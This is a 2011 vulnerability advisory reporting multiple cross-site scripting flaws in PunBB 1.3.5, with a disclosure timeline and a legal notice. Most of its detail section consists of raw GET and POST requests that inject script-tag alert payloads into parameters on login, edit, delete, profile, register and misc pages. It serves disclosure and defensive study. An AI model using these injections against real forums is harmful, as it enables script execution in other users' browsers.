PunBB PHP Forum 1.3.5 Cross Site Scripting

`=======================================================================  
PunBB PHP Forum - Multiple XSS  
=======================================================================  
  
Affected Software : PunBB PHP Forum  
Severity : Medium  
Local/Remote : Remote  
Author : @drk1wi  
  
[Summary]  
  
Just for those whom it might concern.  
These vulnerabilities have been identified for the latest (clean   
version 1.3.5) during one of my penetration tests.  
  
[Vulnerability Details]  
  
  
GET   
/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>  
GET   
/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>  
  
POST /delete.php?id=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>  
  
POST /edit.php?id=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>  
  
POST /login.php?action=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>  
  
POST /misc.php?email=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>  
  
POST   
/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>  
  
POST /register.php?action=>"'><script>alert(oink)</script>  
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>  
  
  
[Time-line]  
  
20/08/2011 - Vendor notified  
02/09/2011 - No e-mail reply and BAN on Forum  
??? - Vendor patch release  
16/09/2011 - Public disclosure  
  
[Fix Information]  
  
  
Cheers,  
Piotr Duszynski (@drk1wi)  
http://sharpsec.net  
  
X. LEGAL NOTICES  
  
Copyright (c) 2011 Piotr "drk1wi" Duszynski  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically,  
please email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information. Use  
of the information constitutes acceptance for use in an AS IS   
condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct,   
indirect,  
or consequential loss or damage arising from use of, or reliance on,  
this information.  
  
`